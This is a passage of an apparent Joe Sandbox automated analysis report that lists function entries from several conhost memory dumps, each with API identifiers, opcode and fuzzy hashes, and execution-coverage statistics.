                                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 190073905-0
                                                                                                                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction ID: 7dab81c2846bc0cc14183f81f09c7feb712f76e97a1f120510975bfc35aebbb0
                                                                                                                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction Fuzzy Hash: 82817B31604E4146FB54BB27DC493D922B3EB87F80F94E01BBD4A57796DE38CA86A700
                                                                                                                                                          Function 000001858EA19EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000046.00000003.2325509229.000001858EA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001858EA10000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_70_3_1858ea10000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction ID: a40bc7d8c4837bc198eb0fe0ff068088c266308ea500d1cb8c680ae61df4a6a9
                                                                                                                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction Fuzzy Hash: 5B51AE36200B808AEB74AF13994839877F2F356F94F95811BDA9A47B95CF38D650EB01
                                                                                                                                                          Function 000001858EA180A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000046.00000003.2325509229.000001858EA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001858EA10000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_70_3_1858ea10000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                          • String ID: csm
                                                                                                                                                          • API String ID: 3242871069-1018135373
                                                                                                                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction ID: 25d8042df7e59db437b47b2e26b6206b5fa33815c4d34e4678ff3cfb2d5cfb7f
                                                                                                                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction Fuzzy Hash: 9151B232311E408AEB55EB16E84CBA833B3E346F98F95C126DA5747788DF78CA81D700
                                                                                                                                                          Function 000001858EA19AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000046.00000003.2325509229.000001858EA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001858EA10000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_70_3_1858ea10000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CallTranslator
                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                          • API String ID: 3163161869-2084237596
                                                                                                                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction ID: afcaed05c652a5a5b94bc523da64245073e27d53a2fb3ba79b0f48c828c94ee8
                                                                                                                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction Fuzzy Hash: F8618032508BC485E771AF16E8447DAB7B5F786B94F448216EB9A17B95CF7CC290CB00

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 000002942EBE2EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000049.00000003.2326200021.000002942EBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002942EBE0000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_73_3_2942ebe0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction ID: cbef3943a86d3397b2efc485fc5f7b319e956dfb870356ec879a509c05f7c158
                                                                                                                                                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction Fuzzy Hash: 37910572F0165187EB64EF25D408F7EBB91FB54B98F988138AE490B788DA39D813C700

                                                                                                                                                          Non-executed Functions

                                                                                                                                                          Function 000002942EBE962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000049.00000003.2326200021.000002942EBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002942EBE0000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_73_3_2942ebe0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction ID: 49e7960e631a13ad5e2111746cd1fb7e93bde27fb68191e75f18ad9ac0635c3c
                                                                                                                                                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction Fuzzy Hash: 8CD1B472E04B4086EB60EF65D48979E7BA0F749788F981115FF895BB96DF34C086C740
                                                                                                                                                          Function 000002942EBE7050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000049.00000003.2326200021.000002942EBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002942EBE0000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_73_3_2942ebe0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 190073905-0
                                                                                                                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction ID: c37b13270aa7407912f7943b88fc27937ecb00801f913bcf71f046192425be9b
                                                                                                                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction Fuzzy Hash: 3F81A230E0036146FA64FB66A84DF6B6ED1BB86780F9C4125BF494FB96DA78C847C700
                                                                                                                                                          Function 000002942EBE9EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000049.00000003.2326200021.000002942EBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002942EBE0000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_73_3_2942ebe0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction ID: e2b8fbb18f3365c7fb40e6b19e0993ec8332f61e2f5c7f77f7c7ae9521c0e5fb
                                                                                                                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction Fuzzy Hash: 1251DF32A003818AEF74EF119148B6ABBA4F755B94F9C4116FF894BBC2CB38D456CB41
                                                                                                                                                          Function 000002942EBE80A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000049.00000003.2326200021.000002942EBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002942EBE0000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_73_3_2942ebe0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                          • String ID: csm
                                                                                                                                                          • API String ID: 3242871069-1018135373
                                                                                                                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction ID: 3523435f5bff0c0534b94175d9606482b1bcaa9e10ea33b5aa815bd4a454552d
                                                                                                                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction Fuzzy Hash: 07519F32B11E408AEF54EB15E448F6E7B91F744B98F9D8525FE4A4B788DB79C842C700
                                                                                                                                                          Function 000002942EBE9AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000049.00000003.2326200021.000002942EBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002942EBE0000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_73_3_2942ebe0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CallTranslator
                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                          • API String ID: 3163161869-2084237596
                                                                                                                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction ID: 073573d9f73a604b9228b53cbba3181b7176bc9675b90e120e148224b89814b4
                                                                                                                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction Fuzzy Hash: 3361A032904BC481DB71EF15E444B9ABBA0F789B98F484215FF981BB95DB7CC195CB00

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 000001C8A0382EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000053.00000003.2326869655.000001C8A0380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C8A0380000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_83_3_1c8a0380000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction ID: 19352068d3fcafc8b099bf857b523b228fd6a7eb083d2af4ac13b28ebcc27920
                                                                                                                                                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction Fuzzy Hash: BF910172B4125087EB649F25D4C4FA9B392FB54F98F5481A69E4B07B88DF38D81BD700

                                                                                                                                                          Non-executed Functions

                                                                                                                                                          Function 000001C8A038962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000053.00000003.2326869655.000001C8A0380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C8A0380000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_83_3_1c8a0380000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction ID: 2c977784fcb8f0e3e9c9eb02f06410c54dbfa55397d3412ffae69ec59b033eea
                                                                                                                                                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction Fuzzy Hash: F0D16732644B808AFB609F6594C0BED77A0F785798F180157EE8B57B9ADF38C58AD700
                                                                                                                                                          Function 000001C8A0387050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000053.00000003.2326869655.000001C8A0380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C8A0380000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_83_3_1c8a0380000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 190073905-0
                                                                                                                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction ID: 7738cf1bb3018d848007226ae80e74287a9053f5b5e9eee177340f91ba4b890f
                                                                                                                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction Fuzzy Hash: 018124316806448AFB50ABA598D1FFD62D3AB867C0F4440979E0B47796DF38C84FE740
                                                                                                                                                          Function 000001C8A0389EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000053.00000003.2326869655.000001C8A0380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C8A0380000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_83_3_1c8a0380000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction ID: 0b30fe50fdfef2a01b5cd5ac631995bf67571dd6f93737474a190a8c95b73af6
                                                                                                                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction Fuzzy Hash: 9E519C722806848AFB748F2195C4B9877A0F354B99F184197DB8B87BD5CF38C45AEB01
                                                                                                                                                          Function 000001C8A03880A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000053.00000003.2326869655.000001C8A0380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C8A0380000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_83_3_1c8a0380000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                          • String ID: csm
                                                                                                                                                          • API String ID: 3242871069-1018135373
                                                                                                                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction ID: 889c46e17dbd64792637c4671fe6e62dd1562e99e52175427f1cca2d013c775e
                                                                                                                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction Fuzzy Hash: 6651AF32351A008AFB54CB55E4C8FAD3392F744B98F158966EA5B47788DFB8D84BD700
                                                                                                                                                          Function 000001C8A0389AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000053.00000003.2326869655.000001C8A0380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C8A0380000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_83_3_1c8a0380000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CallTranslator
                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                          • API String ID: 3163161869-2084237596
                                                                                                                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction ID: 1bb4b78811c5c4abe62e571f68841a64e8376ae27c028714d208fe64885c0b68
                                                                                                                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction Fuzzy Hash: DB61A432504BC486E7719F25E4C0BDAB7A0F785B98F084257EB9A07B95CF78D199CB00

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 000001E5EF032EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000057.00000003.2328439710.000001E5EF030000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E5EF030000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_87_3_1e5ef030000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction ID: e9ddc09656c535c507aabf7bebc263a342af66bf69c25ca857974b45eb6f4c50
                                                                                                                                                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction Fuzzy Hash: 3191F672B02A908BDB64CF25D480BBDF392F754F9CF5481249E4A07788DE38DA92C720

                                                                                                                                                          Non-executed Functions

                                                                                                                                                          Function 000001E5EF03962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000057.00000003.2328439710.000001E5EF030000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E5EF030000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_87_3_1e5ef030000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction ID: 1e01f096067bcabed8c542143390de27975402baa7fda43b1b3fe88bc6448095
                                                                                                                                                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction Fuzzy Hash: 70D15932605F808AEB60DB65D4803EDB7A2F79579CF100216EE8A57B9AEF34D6C1C750
                                                                                                                                                          Function 000001E5EF037050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000057.00000003.2328439710.000001E5EF030000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E5EF030000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_87_3_1e5ef030000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 190073905-0
                                                                                                                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction ID: 3f63e6bbcb06ac1ace6e4e463d0979961c0b65d184a1f480475221ca84d76ab9
                                                                                                                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction Fuzzy Hash: 2B81913160AEC586FB66DB25D8413FDE393AB86788F844015DD0B87796DE38CBC68720
                                                                                                                                                          Function 000001E5EF039EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000057.00000003.2328439710.000001E5EF030000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E5EF030000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_87_3_1e5ef030000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction ID: 3438cb41270473d6357098ffc23fb8e70859165a43d0e0ae1de4f186cd2278b2
                                                                                                                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction Fuzzy Hash: E3517D3A206AC18AEB74CF21D5443ACB7A2F354B9CF144216DE9A47B95CF38D6D0CB21
                                                                                                                                                          Function 000001E5EF0380A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000057.00000003.2328439710.000001E5EF030000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E5EF030000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_87_3_1e5ef030000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                          • String ID: csm
                                                                                                                                                          • API String ID: 3242871069-1018135373
                                                                                                                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction ID: 342457e0b5f12076314656442a898e3fe87875a873b872c18f7f278e0240bf96
                                                                                                                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction Fuzzy Hash: 72516933212E808AEB54CB16E444BBDB7E6E744B9CF158565EE4B47788DB78CB81C720
                                                                                                                                                          Function 000001E5EF039AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000057.00000003.2328439710.000001E5EF030000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E5EF030000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_87_3_1e5ef030000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CallTranslator
                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                          • API String ID: 3163161869-2084237596
                                                                                                                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction ID: 141dd43aeb2e4055bd42f876e11c26b587a96ccb43ca305d94d281b557471410
                                                                                                                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction Fuzzy Hash: DD617732509BC482EB60CB15E4413EEB7A2F785B88F044215EF9A07B99EF78D2D0CB10

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:41.7%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                          Signature Coverage:46.5%
                                                                                                                                                          Total number of Nodes:245
                                                                                                                                                          Total number of Limit Nodes:28
